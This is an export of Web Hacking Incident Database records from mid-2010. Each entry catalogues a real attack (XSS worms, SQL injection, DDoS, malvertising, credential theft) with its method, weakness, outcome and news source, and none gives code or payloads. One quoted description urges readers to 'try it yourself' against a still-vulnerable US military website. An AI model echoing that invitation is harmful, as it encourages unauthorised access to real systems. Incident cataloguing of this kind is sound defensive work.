WHID ID: 2010-175
Date Occured: 9/21/2010
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Worm
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: There is currently a persistent cross-site scripting vulnerability on the main Twitter site and researchers say that the bug is being exploited via proof-of-concept code. The bug appeared Tuesday morning and experts quickly noticed users taking advantage of the flaw. Details of the bug are slim right now, though experts say that mousing over a specific link will produce a pop-up window that displays the logged-in user's Twitter cookie.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://threatpost.com/en_us/blogs/persistent-xss-bug-twitter-being-exploited-092110
Attack Source Geography:
Attacked System Technology: Twitter
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-174: GOP lawmaker: My Twitter account was 'hacked by robospammers'
WHID ID: 2010-174
Date Occured: 9/15/2010
Attack Method: Brute Force
Application Weakness: Insufficient Authentication
Outcome: Link Spam
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: Rep. John Culberson (R-Texas) returned to Twitter after a nearly five-month break Tuesday night, only to have his account hacked. "If you got a weird tweet from me ignore it & do not click on the hyperlinks -they are prob viruses- my account was hacked by robospammers," he tweeted Wednesday morning. He noted later that he had "fixed the account."
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://thehill.com/blogs/twitter-room/other-news/118909-gop-lawmaker-my-twitter-account-was-hacked-by-robospammers
Attack Source Geography:
Attacked System Technology: Twitter
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-173: Polish hacker gets inside US Military's Defence Logistic Agency website
WHID ID: 2010-173
Date Occured: 9/16/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Defacement
Attacked Entity Field: Government
Attacked Entity Geography: USA
Incident Description: There is one movie every Polish person knows. It's a cult comedy from the 80s called "Miś" - meaning "Teddy Bear". Now, thanks to a hacker going by the name "Porkythepig", everyone can see it - but not on YouTube where you would expect it, but on the US military's Defense Logistics Agency website. If you go to the site and just type "porkythepig", a fragment of the movie begins to play. It's in Polish, of course - for those not fluent in Polish, the man with a guitar sings: "I'm a Happy Romek..." It's funny, but the story is much more serious. On Seclists.org you can find a post by porkythepig about the potential vulnerability that exists on many sites, including military and government ones. But apparently since March, when the details of the insecurity were published on seclists.org, nobody did anything to patch the vulnerability, so porkythepig decided to prove his observations the hard way. The Polish language source is here - but the vulnerability still works at time of publishing so try it yourself.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.techeye.net/security/polish-hacker-gets-inside-us-militarys-defence-logistic-agency-website
Attack Source Geography: Poland
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link: http://seclists.org/fulldisclosure/2010/Mar/521
Entry Title: WHID 2010-172: Cipro steps up security after hacking
WHID ID: 2010-172
Date Occured: 9/17/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Disinformation
Attacked Entity Field: Government
Attacked Entity Geography: South Africa
Incident Description: The Companies and Intellectual Property Registration Office (Cipro) said on Thursday it beefed up internal security to make sure directors cannot be removed from companies without the proper processes being followed. It emerged last week that several directors of Kalahari Resources had been removed with their names substituted. Cipro has been under fire for several months following claims criminals were able to hack into its database.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.eyewitnessnews.co.za/articleprog.aspx?id=48673
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-171: Hackers Push Malicious Ads onto UK Celebrity Gossip Website
WHID ID: 2010-171
Date Occured: 9/17/2010
Attack Method: Known Vulnerability
Application Weakness: Improper Input Handling
Outcome: Planting of Malware
Attacked Entity Field: Entertainment
Attacked Entity Geography: UK
Incident Description: The Popbitch celebrity gossip website was blacklisted by Google after hackers managed to compromise its ad server and push malware to users. A Popbitch spokesperson has since confirmed that the website served malicious ads for a limited period of time after its ad server was compromised by hackers. "We've got to the bottom of this problem and are just waiting for the all clear from Google," they told The Register. "There is a vulnerability in Open Ads X, the ad server we were using. We've cut off open ads from Popbitch and are upgrading to OpenAds 2.8.7," they added.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.softpedia.com/news/Hackers-Push-Malicious-Ads-onto-UK-Celebrity-Gossip-Website-156768.shtml
Attack Source Geography:
Attacked System Technology: OpenX
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-170: OpenX Vulnerability Exploited to Compromise Multiple Ad Servers
WHID ID: 2010-170
Date Occured: 9/15/2010
Attack Method: Known Vulnerability
Application Weakness: Improper Input Handling
Outcome: Planting of Malware
Attacked Entity Field: Entertainment
Attacked Entity Geography:
Incident Description: A vulnerability in a component of the OpenX advertising platform has been exploited by hackers to tamper with ad serving on multiple websites including The Pirate Bay, eSarcasm and AfterDawn. The affected component, called Open Flash Chart 2, is developed by a third party, but has been included by default in OpenX since last December. The module allows visitor statistics to be displayed as graphic charts and the vulnerability is located in the ofc_upload_image.php script, which fails to properly validate uploaded files or the users uploading them. According to Heise Media, the flaw was originally discovered a year ago by another open source project, which uses the same component, but it escaped the OpenX developers when deciding to integrate it. As a result, hackers can leverage the bug to upload executable scripts and gain complete control of the servers.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.softpedia.com/news/Unpatched-OpenX-Vulnerability-Exploited-to-Compromise-Multiple-Ad-Servers-156402.shtml
Attack Source Geography:
Attacked System Technology: OpenX
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-169: TechCrunch Europe hacked to spread malware like a poison ivy infection
WHID ID: 2010-169
Date Occured: 9/7/2010
Attack Method: Misconfiguration
Application Weakness: Application Misconfiguration
Outcome: Planting of Malware
Attacked Entity Field: Media
Attacked Entity Geography: Europe
Incident Description: Graham Cluley, Senior Technology Consultant at Sophos, blogged, "A closer examination of TechCrunch Europe's site reveals that the offending code - which uses a malicious iFrame - is found in a JavaScript file, used by the site as part of its WordPress infrastructure. This attempts to serve up a malicious PDF file, exploiting a vulnerability that brings to your computer a nasty infection from the ZBot (also known as Zeus) malware family."
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://blogs.computerworld.com/16888/techcrunch_europe_hacked_to_spread_malware_like_a_poison_ivy_infection
Attack Source Geography:
Attacked System Technology: WordPress
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-168: Symantec secures its vulnerable "Hack is Wack" site
WHID ID: 2010-168
Date Occured: 9/7/2010
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Technology
Attacked Entity Geography:
Incident Description: Security giant Symantec said it has secured its “Hack is Wack” contest website after researchers discovered it was riddled with vulnerabilities. Last week, Symantec, with the help of famed rapper Snoop Dogg, began promoting its new “Hack is Wack” marketing campaign for its Norton anti-virus products. As part of the effort, budding rappers are invited to post a video about cybercrime for a chance to win Snoop concert tickets and to hang out with his management team.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.scmagazineus.com/symantec-secures-its-vulnerable-hack-is-wack-site/article/178388/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-167: Facebook closes hole that let spammers auto-post to walls, friends
WHID ID: 2010-167
Date Occured: 9/7/2010
Attack Method: Cross Site Request Forgery (CSRF)
Application Weakness: Improper Output Handling
Outcome: Disinformation
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: Facebook has closed a hole that was being used by spammers to automatically post wall messages and direct messages to friends, the company said on Tuesday. Just clicking on the link to one of the applications that were taking advantage of the bug would allow the auto-posting to happen, Facebook said. The apps, which appeared to be sending people to a survey Web site, were disabled on Monday, the company said. "Earlier this week, we discovered a bug that made it possible for an application to bypass our normal CSRF (cross-site request forgery) protections through a complicated series of steps. We quickly worked to resolve the issue and fixed it within hours of discovering it," Facebook said in a statement. "For a short period of time before it was fixed, several applications that violated our policies were able to post content to people's profiles if those people first clicked on a link to the application."
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.cnet.com/8301-27080_3-20015728-245.html
Attack Source Geography:
Attacked System Technology: Facebook
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-166: Twitter Patches Account Hijacking Vulnerability
WHID ID: 2010-166
Date Occured: 9/8/2010
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Session Hijacking
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: Twitter users faced a virulent new JavaScript-based account hijacking attack on Monday. Simply clicking on one of the malicious links involved, disguised as innocuous-looking links in Tweets, enabled attackers to hijack a user's account and post numerous Tweets.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml?articleID=227300371&cid=RSSfeed_IWK_News
Attack Source Geography: Brazil
Attacked System Technology: Twitter
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-165: FMT under DDOS attack
WHID ID: 2010-165
Date Occured: 9/9/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: News
Attacked Entity Geography: Malaysia
Incident Description: The FreeMalaysiaToday website has come under attack, rendering the news portal inaccessible to readers since 3am this morning. According to FMT's chief technical officer Thirun Nadason, the Distributed Denial of Service (DDOS) attack is believed to be the work of professionals.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.freemalaysiatoday.com/fmt-english/news/general/10094-fmt-under-ddos-attack
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-164: Company Paid to Launch DoS Attacks Against Torrent Sites
WHID ID: 2010-164
Date Occured: 9/10/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Entertainment
Attacked Entity Geography:
Incident Description: An Indian company paid by the film industry to get copyrighted works removed from the Internet openly admits to launching Denial of Service (DoS) attacks against torrent sites that refuse to comply with takedown notices.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.softpedia.com/news/Company-Paid-to-Launch-DoS-Attacks-Against-Torrent-Sites-155892.shtml
Attack Source Geography: India
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-163: Ironman websites targeted by cyberattack
WHID ID: 2010-163
Date Occured: 8/31/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Sports
Attacked Entity Geography:
Incident Description: According to a press release today from Ironman.com, the site was a victim of a Distributed Denial-of-Service (DDoS) attack.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.examiner.com/triathlon-in-national/ironman-websites-targeted-by-cyberattack?render=print#print
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-162: Dick's says poll was hacked
WHID ID: 2010-162
Date Occured: 9/1/2010
Attack Method: Process Automation
Application Weakness: Insufficient Anti-automation
Outcome: Disinformation
Attacked Entity Field: Hospitality
Attacked Entity Geography: Washington, USA
Incident Description: The poll to influence where a new Dick's Drive-In location will be built has been so popular, a hacker found a way to electronically stuff the ballot box. Monday, the company's website, www.ddir.com, listed three geographic areas where the restaurant could be built. A hacker wrote a script that repeatedly cast votes for one of the locations.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.seattlepi.com/local/426071_dicks02.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-161: IBC Bank Online Banking Website is Down or Under DDoS Attack?
WHID ID: 2010-161
Date Occured: 9/2/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Finance
Attacked Entity Geography: Texas, USA
Incident Description: There have been a lot of online banking websites experiencing downtime for various reasons these past few weeks. Last week we reported that the Bank of America website crashed for at least 4 hours, and now it is the IBC bank. Both the IBC Bank website (IBC.com) and the IBC Bank Online login site (ibcbankonline.ibc.com) are currently down.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.adi-news.com/ibc-bank-online-banking-website-is-down-or-under-ddos-attack/24357/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-160: Hackers crack e-mail server of Russian Federal Protection Service (gov.ru)
WHID ID: 2010-160
Date Occured: 8/23/2010
Attack Method: Insufficient Authentication
Application Weakness: Application Misconfiguration
Outcome: Leakage of Information
Attacked Entity Field: Government
Attacked Entity Geography: Russia
Incident Description: The email server of one of the Federal Protection Service (FPS) departments was attacked. As a result, for several hours every Internet user was able to access the FPS e-mail archive. The attack succeeded because the system was reachable from the Internet and also because of an administrator failure: they did not modify default settings, including the passwords for accounts used to access the system with administrative privileges.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.securitylab.ru/news/397019.php
Attack Source Geography:
Attacked System Technology: Dozor
Cost:
Items Leaked:
Number of Records:
Additional Link: http://habrahabr.ru/blogs/infosecurity/102391/
Entry Title: WHID 2010-159: 500 000 websites hacked, including Apple
WHID ID: 2010-159
Date Occured: 8/17/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Worm
Attacked Entity Field:
Attacked Entity Geography:
Incident Description: As reported by The Register IT news portal, a number of smaller websites have been hacked using an SQL injection attack method that attempts to obfuscate links to malware infected pages. The hack apparently also affected two Apple websites that are used to promote its iTunes podcasts. Other than the Apple sites, the news service says that at least 538 000 “mom-and-pop” websites have been victimized by the hack, in addition to 500 000 more that appear quite similar but lead to different domains. The attack takes advantage of web-based application vulnerabilities, which often do not differentiate between legitimate search queries and intentional attacks via malicious code. The Register reported that the malware-infected links have been removed from the Apple pages since Google last indexed its search page earlier this month. The attack underlines the need for companies to go the extra mile and secure external web-facing applications said Rob Horton, the operational director of security testing consultant NCC Group.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.infosecurity-us.com/view/11870/500-000-websites-hacked-including-apple/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link: http://www.theregister.co.uk/2010/08/17/apple_sql_attack/
Entry Title: WHID 2010-158: National Space Agency of the Republic of Kazakhstan was hacked
WHID ID: 2010-158
Date Occured: 7/18/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Government
Attacked Entity Geography: Kazakhstan
Incident Description: On the 18th of July the hack-world.org group, using an SQL Injection attack, obtained access to the administration section of the National Space Agency of the Republic of Kazakhstan. Obtaining access to the administration system of the site was facilitated by the fact that administrators used weak passwords, which allowed local recovery of the passwords from their MD5 hashes. Currently, the site is under reconstruction.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://habrahabr.ru/blogs/infosecurity/99736/
Attack Source Geography: Russia
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link: http://hack-world.org/showthread.php?t=5133
Entry Title: WHID 2010-157: Facebook Full Disclosure
WHID ID: 2010-157
Date Occured: 7/20/2010
Attack Method: SQL Injection
Application Weakness: Information Leakage
Outcome: Disclosure Only
Attacked Entity Field: Internet
Attacked Entity Geography:
Incident Description: apps.facebook.com website hacked via SQL Injection.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://sla.ckers.org/forum/read.php?16,35138,35138#msg-35138
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link: http://devteev.blogspot.com/2010/07/facebook-full-disclosure.html
Entry Title: WHID 2010-156: The Russian Railways tickets site was hacked
WHID ID: 2010-156
Date Occured: 7/21/2010
Attack Method: Unknown
Application Weakness: Misconfiguration
Outcome: Defacement
Attacked Entity Field: Transport
Attacked Entity Geography: Russia
Incident Description: Unknown attackers hacked the official site of the "Russian Railways" company. As a result, web pages were replaced by the hackers' messages. The site was temporarily blocked; it has now resumed, but some pages are still unavailable, the "Buying Train Tickets" web page (ticket.rzd.ru) among them. No details about personal data leakage are available yet.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.uinc.ru/news/sn14165.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-155: S. Korean Gov't Websites Hit by Hacker Attacks
WHID ID: 2010-155
Date Occured: 7/7/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Government
Attacked Entity Geography: South Korea
Incident Description: Official websites of South Korean government agencies, including the presidential office and the foreign ministry, came under hacker attacks Wednesday, a national telecom regulator said. According to the state-run Korean Communications Commission (KCC), the websites of government agencies, such as the presidential office Cheong Wa Dae, the Ministry of Foreign Affairs and Trade, and private firms, including the leading Internet search engine Naver, Nonghyup Bank and the Korean Exchange Bank, were hit by so-called distributed denial-of-service (DDoS) attacks from around 6:00 p.m. local time (0900 GMT) Wednesday.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://english.cri.cn/6966/2010/07/07/1461s581567.htm
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-154: Justin Bieber My World Tour Contest Hacked
WHID ID: 2010-154
Date Occured: 7/2/2010
Attack Method: Process Automation
Application Weakness: Insufficient Anti-automation
Outcome: Disinformation
Attacked Entity Field: Entertainment
Attacked Entity Geography: USA
Incident Description: That was but a preliminary skirmish – they've come up with a much more damaging plan – to send Bieber to North Korea. Foolish, foolish Bieber has started a competition for countries to vote for him to come and tour them. Called the Justin Bieber My World Tour Contest, it has now been thoroughly hijacked by Anonymous – at the time of writing, North Korea is in second place by only a few thousand votes. Unless the current leader Israel can get its act together, it should be overtaken by lunchtime.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://blogs.independent.co.uk/2010/07/02/the-plot-to-send-justin-bieber-to-north-korea/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-153: App Store, Hacked.
WHID ID: 2010-153
Date Occured: 7/4/2010
Attack Method: Stolen Credentials
Application Weakness: Insufficient Authentication
Outcome: Monetary Loss
Attacked Entity Field: Retail
Attacked Entity Geography: USA
Incident Description: This article began with details of one specific app developer hacking iTunes users' accounts and purchasing their own apps using those accounts – making it to the top of the iTunes charts. As the story has developed it appears to be far more widespread than just that one particular developer and his apps…the Apple App Store is filled with App Farms being used to steal. We've put together a complete list of all the facts and updates to this story here, which we highly recommend you read instead of this article. Apple has also now released a statement about the matter.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://thenextweb.com/apple/2010/07/04/app-store-hacked/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-152: The Pirate Bay hacked
WHID ID: 2010-152
Date Occured: 7/5/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Disclosure Only
Attacked Entity Field: Internet
Attacked Entity Geography: Sweden
Incident Description: According to an advisory posted on the web site of an Argentinian group of security researchers, they were able to obtain access to the Pirate Bay's administration panel by discovering multiple SQL injections, leading to the exposure of emails, MD5 hashes of passwords, and the IP address of any particular Pirate Bay user.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://krebsonsecurity.com/2010/07/pirate-bay-hack-exposes-user-booty/
Attack Source Geography: Argentina
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link: http://insilence.biz/2010/07/multiple-sql-injections-on-the-pirate-bay/
Entry Title: WHID 2010-151: YouTube Hacked
WHID ID: 2010-151
Date Occured: 7/4/2010
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: Today, members of the Internet communities 4chan and other enterprising computer whizzes hacked YouTube using a vulnerability in the site’s comment system. While the hack was used on a variety of videos, striking music videos featuring teen pop idol Justin Bieber was the most popular activity. Twitter lit up with complaints about the problem, Google support got some concerned posts on its forum, and we received tips in our inbox. The event caused quite a Sunday-morning stir. The bug allowed users to inject HTML (the code that most websites are built with) that could be executed on the site, whereas HTML within comments is supposed to be restricted. The hackers did everything from force pop-up messages to appear over the site declaring that it had been hacked to redirecting Bieber video pages to sites hosting pornography and malware.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.acunetix.com/blog/web-security-zone/articles/dangerous-xss-vulnerability-found-on-youtube-the-vulnerability-explained/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-150: At least four Armenian websites were attacked by Azerbaijani hackers
WHID ID: 2010-150
Date Occured: 7/3/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Government
Attacked Entity Geography: Armenia
Incident Description: At least four Armenian websites were attacked by Azerbaijani hackers within a week. On July 2, the websites of the Henaran.am press club (Henaran.am) and Armenia's Sambo Federation (sambo.am) were hacked to place Azerbaijan's flag and references to Azerbaijani media on them. Both websites have since resumed operation. In addition, on June 29, hackers attacked the announcements site Azdagir.am again to place the Azerbaijani flag on it, as well as information on the January 20, 1990, events in Baku. On June 30, the owner of the psyarmenia.com website told PanARMENIAN.Net that the psychology site was hacked and a poster on "Armenian terror" was placed on it. Currently, the two websites do not operate.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.panarmenian.net/eng/it_telecom/news/50897/At_least_four_Armenian_websites_were_attacked_by_Azerbaijani_hackers
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-149: Identity Stolen Through X-Box Live
WHID ID: 2010-149
Date Occured: 7/3/2010
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Monetary Loss
Attacked Entity Field: Entertainment
Attacked Entity Geography: USA
Incident Description: Rosalinda Gonzalez bought the X-Box 360 console for her sons. They enjoy playing the video games and using the live service, where they can connect with players from around the world. In order to purchase the monthly live membership, Gonzalez entered her credit card information into her son's online profile. It is supposed to be kept private, but Gonzalez says her son's profile was hacked by a computer whiz. The man changed her son's password, stole game points and started making purchases using her credit card information. She says her boys actually spoke to the hacker through X-Box Live. The man admitted to stealing other people's personal information too.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.krgv.com/content/news/story/Identity-Stolen-Through-X-Box-Live/vKZIV1Rboki6lngI78Qf_w.cspx
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-148: AsSeenOnTV SQL injection into corporate web server exposed credit card information of customers
WHID ID: 2010-148
Date Occured: 6/29/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Planting of Malware
Attacked Entity Field: Retail
Attacked Entity Geography: USA
Incident Description: AsSeenOnTV website hacked via SQL Injection and planted malware.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://datalossdb.org/incidents/2953
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-147: Biggest blog company Skyblog hacked 32,000,000 accounts stolen
WHID ID: 2010-147
Date Occured: 5/19/2010
Attack Method: Misconfiguration
Application Weakness: Application Misconfiguration
Outcome: Leakage of Information
Attacked Entity Field: Blogs
Attacked Entity Geography: France
Incident Description: Earlier this week, the IT staff of Skyrock / Skyblog audited its servers, a routine check that can track down bugs and small technical malfunctions. Except this time, the "bug" seems to be much more serious. A file named "hello" and some scripts were discovered on a server. Without hesitation, the alert was raised and a more complete audit was carried out. It was then discovered that an intrusion had been orchestrated through a backdoor uploaded via a misconfigured "Download" service (Waka). From this foothold, the intruders have almost certainly got their hands on more than 32 million Skyblog accounts. It seems that the intruder will be difficult to trace: he wiped the logs after his passage. One IP address does appear, but it leads to a proxy based in England. The editorial staff of ZATAZ.COM was able to learn the exact date of the intrusion.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://datalossdb.org/incidents/2948
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-146: Hacking ring busted over test scores
WHID ID: 2010-146
Date Occured: 6/29/2010
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Disinformation
Attacked Entity Field: Education
Attacked Entity Geography: China
Incident Description: Police in Jinan, Shandong Province arrested several members of a ring that hacked into education websites to change test scores and forge credentials for cash.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://english.people.com.cn/90001/90776/90882/7044956.html
Attack Source Geography: China
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-145: Hacker tries to manipulate Maine's legislative website
WHID ID: 2010-145
Date Occured: 6/29/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Government
Attacked Entity Geography: Maine
Incident Description: The state's online database of legislative activity has been taken offline because of an attempt by an unknown hacker to manipulate the website's coding. On Thursday, the Legislature's information technology officials shut down the website's bill status function, which allows users to follow legislation such as roll calls, committee votes, amendments and fiscal notes. The manipulated code inserted the addresses of extraneous websites that could have exposed users' computers to harm if they clicked on the links, said Scott Clark, director of information technology for the Legislature.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.pressherald.com/news/hacker-tries-to-manipulate-legislative-website-_2010-06-29.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-144: Hackers Steal $465,000 from Escrow Firm
WHID ID: 2010-144
Date Occured: 6/29/2010
Attack Method: Banking Trojan
Application Weakness: Insufficient Authentication
Outcome: Monetary Loss
Attacked Entity Field: Finance
Attacked Entity Geography: California
Incident Description: A total of $465,000 was recently stolen from California-based Village View Escrow via 26 consecutive wire transfers. "Owner Michelle Marisco said her financial institution at the time -- Professional Business Bank of Pasadena, Calif. -- normally notified her by e-mail each time a new wire was sent out of the company’s escrow account," writes Krebs on Security's Brian Krebs. "But the attackers apparently disabled that feature before initiating the fraudulent wires." "Marisco said that a few days before the theft, she opened an e-mail informing her that a UPS package she had been sent was lost, and urging her to open the attached invoice," Krebs writes. "Nothing happened when she opened the attached file, so she forwarded it on to her assistant who also tried to view it. The invoice was in fact a Trojan horse program that let the thieves break in and set up shop and plant a password-stealing virus on Marisco’s computer, and on the PC belonging to her assistant -- the second person needed to approve transfers."
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.esecurityplanet.com/headlines/article.php/3890291/article.htm
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-143: Whirlpool Repeatedly Hit by DDoS Attacks
WHID ID: 2010-143
Date Occured: 6/29/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Media
Attacked Entity Geography: Australia
Incident Description: Australian broadband news website Whirlpool.net.au was the target of several Distributed Denial of Service (DDoS) attacks this morning. The hosting provider moved quickly to mitigate, but attackers evaded the restrictions, causing an aggregated downtime of around ten hours. Whirlpool.net.au is one of the most trafficked Australian websites, housing a community of over 350,000 registered users. It was started twelve years ago as a place to discuss Internet broadband services in the country, but has since evolved into a full-blown news website covering the telecommunications industry. "Bulletproof received monitoring alerts of packet loss at 12:45 am. We identified it as a classic denial-of-service attack being targeted at Whirlpool. We immediately blocked Whirlpool IP addresses to observe it better and then we were able to track down that it was originating from Denmark and the United States," Lorenzo Modesto, chief operating officer at Bulletproof Networks, the company hosting Whirlpool, commented for ZDNet Australia.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.softpedia.com/news/Whirlpool-Repeatedly-Hit-by-DDoS-Attacks-145629.shtml
Attack Source Geography: Denmark
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-142: Hackers vandalise 200 web sites, cripple 150
WHID ID: 2010-142
Date Occured: 6/28/2010
Attack Method: Administration Error
Application Weakness: Application Misconfiguration
Outcome: Downtime
Attacked Entity Field: Hosting Providers
Attacked Entity Geography: Australia
Incident Description: The web sites of more than a whopping 200 Australian organisations were hijacked and vandalised in a spate of hacks last week. In the largest single attack, a hacker gained administrative access to the Direct Admin server management system used by a hosting provider, who Computerworld Australia will not name, and suspended 159 accounts rendering their web sites inaccessible to the public. The suspension notification page was then defaced with the hackers’ moniker and religious propaganda. The hack was launched through a flaw created after an automatic patch of the admin system failed to complete.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.computerworld.com.au/article/351360/hackers_vandalise_200_web_sites_cripple_150/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-141: Virginia Right! Under Fire Yesterday With DDOS Attack
WHID ID: 2010-141
Date Occured: 6/27/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Blogs
Attacked Entity Geography: Virginia, USA
